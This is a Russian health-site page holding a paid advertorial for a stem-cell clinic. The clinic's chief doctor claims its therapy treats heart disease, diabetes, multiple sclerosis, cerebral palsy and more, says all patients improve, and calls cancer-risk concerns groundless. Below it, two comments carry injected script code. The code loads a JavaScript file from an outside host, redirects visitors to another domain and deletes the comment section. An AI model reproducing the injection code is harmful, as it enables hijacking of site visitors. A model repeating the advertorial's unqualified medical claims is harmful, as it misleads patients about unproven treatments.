Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Клетками лечим и сердце, ...  >>  Клетками лечим и сердце, и печень
 
Обратная связь
 

Клетками лечим и сердце, и печень

Размер шрифта
15 октября 2013 00:00
  • google_analytics: false
  • Нравится

Испокон веков люди ищут способы  обретения здоровья и красоты. Когда-то Клеопатра растворяла жемчуг в уксусе и пила раствор, считая его эликсиром долголетия. Легендарный медик Парацельс употреблял с той же целью вегетабельную серу...

В существование эликсира долголетия серьезные ученые не очень-то верят, но считают, что у каждого человека есть возможность прожить активной, полноценной жизнью лет до 100-120. И многое тут зависит от отношения к своему здоровью и стремления сохранить его и продлить молодость.

Последние исследования ученых доказывают, что в этом вопросе может помочь клеточная медицина.

Внимание ученых всего мира приковано к стволовым клеткам уже многие годы. Стволовые клетки (СК) уникальны тем, что не имеют дифференциации, и, в зависимости от обстоятельств, могут  стать нормальными полнофункциональными клетками  любого органа и любой ткани. Таким образом, к примеру, СК могут «залатать» ткань сердечной мышцы, восстановить поврежденные сосуды... Получается, что если научиться управлять СК, можно избавиться практически от любых заболеваний.

И определенные успехи уже достигнуты. Так, более двадцати лет в мире проводятся пересадки кроветворных (гемопоэтических) стволовых клеток при лечении злокачественных заболеваний крови. Кроме того, другие, мезенхимальные СК используют для наращивания кожи в ожоговой медицине; с их помощью лечат также ряд сердечно-сосудистых заболеваний.

Тем временем, открытия в «стволовой медицине» продолжаются. Подумайте сами: только за последние 10 лет за исследования в области клеточных технологий выдано семь Нобелевских премий. При этом ученые всех стран, в том числе и России, наибольшие надежды возлагают на использование так называемых мезенхимальных  аутологических (собственных) СК человека. Их можно получать, например, из  жировой ткани человека или из ткани костного мозга – и вводить в организм с целью регенерации поврежденных органов.

Эта методика уже находит применение в реконструктивной хирургии и лечении различного рода повреждений мягких и твердых тканей. Ее начинают использовать  для лечения диабетической стопы и для восстановления поврежденных участков костей. Например, в США сейчас идут два исследования по использованию данной технологии для лечения последствий инфарктов и острой сердечной недостаточности. На  проведение этих исследований получено разрешение от FDA (Агентства по контролю за применением лекарственных средств и продуктов). Такое же исследование началось и в Европе. В Японии же изучают возможность лечения с помощью этой методики заболеваний печени, в том числе, цирроза. Очевидно, что количество показаний к такому виду лечения будет постоянно расширяться.

И все же сегодня отношение к клеточным технологиям в обществе неоднозначное. Периодически появляются тревожные слухи о том, что введение стволовых клеток приводит к развитию онкологических процессов.  Но звучат и другие мнения: что за клеточными технологиями – будущее, и что они – панацея от всех болезней.

Так где же истина? Она, конечно же, лежит посередине.

«Я бы не назвал стволовые клетки лекарством от всех болезней, некоей «волшебной пилюлей», способной сразу же  поставить человека на ноги, чем бы он ни болел.  Но сбрасывать со счетов достижения клеточной медицины нельзя. Достаточно вспомнить, что кроветворные стволовые клетки используются в лечении онкологии очень давно – все же знают о таком виде лечения, как пересадка костного мозга. Специалистами нашей клиники практически подтверждена эффективность применения мезенхимальных стволовых клеток для лечения таких серьезных заболеваний, как инфаркт миокарда, ишемическая болезнь сердца, дилатационная кардиомиопатия, стенокардия, кардиосклероз, сахарный диабет, рассеянный склероз, последствия инсульта, поражения желудочно-кишечного тракта, костно-мышечной и нервной систем, детский церебральный паралич и многих других патологических состояний и синдромов. Нет, мы не беремся вылечить человека раз и навсегда от любой болезни. Однако у всех наших пациентов после клеточной терапии наступает улучшение состояния в той или иной степени. Все зависит от состояния организма человека и от того, насколько рано он к нам обратился», – рассказывает главный врач клиники стволовых клеток «Новейшая медицина» Юрий Хейфец.

« Конечно, легче всего болезнь вообще не лечить, а предупреждать. Но и тут может помочь клеточная медицина! Ведь своевременно проведённая регенерация (ревитализация) биологических тканей организма способна предотвратить развитие множества болезней и на долгие годы обеспечить человеку состояние практического здоровья и комфортной активной полноценной жизни», – продолжает доктор Хейфец.

«Что же касается опасений относительно возможного развития различных  побочных эффектов при применении методик клеточной медицины, то за 20 лет ее использования в практике клиницистов еще ни разу не удалось доказать связи между введением стволовых клеток и развитием рака или других серьезных осложнений. Поэтому опасения на сей счет можно назвать разве что досужими домыслами, не имеющими никакого отношения к доказательной медицине».

Так, может быть, за клеточными технологиями – будущее современной медицины?

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:00

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:57

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как понять, что вы пьете слишком много? Или уже спиваетесь?   У вас больное сердце! Нет? А если нагнуться?   Горький шоколад полезен для сердца! Но все благодаря бактериям!   Ваше появление на свет – чудо  
22 июня 2013Грецкие орехи спасут от инфаркта 18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя?
 
12 июня 2013Обычный шум может вызвать остановку сердца! Как избежать этого? 01 ноября 2013ИНВИТРО – «Марка №1» в России
 

Слайдшоу

1
5 напитков, которые защитят ваше сердце
Оказывается, шоколад НАДО есть!
Как сохранить мозги в 30 лет

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.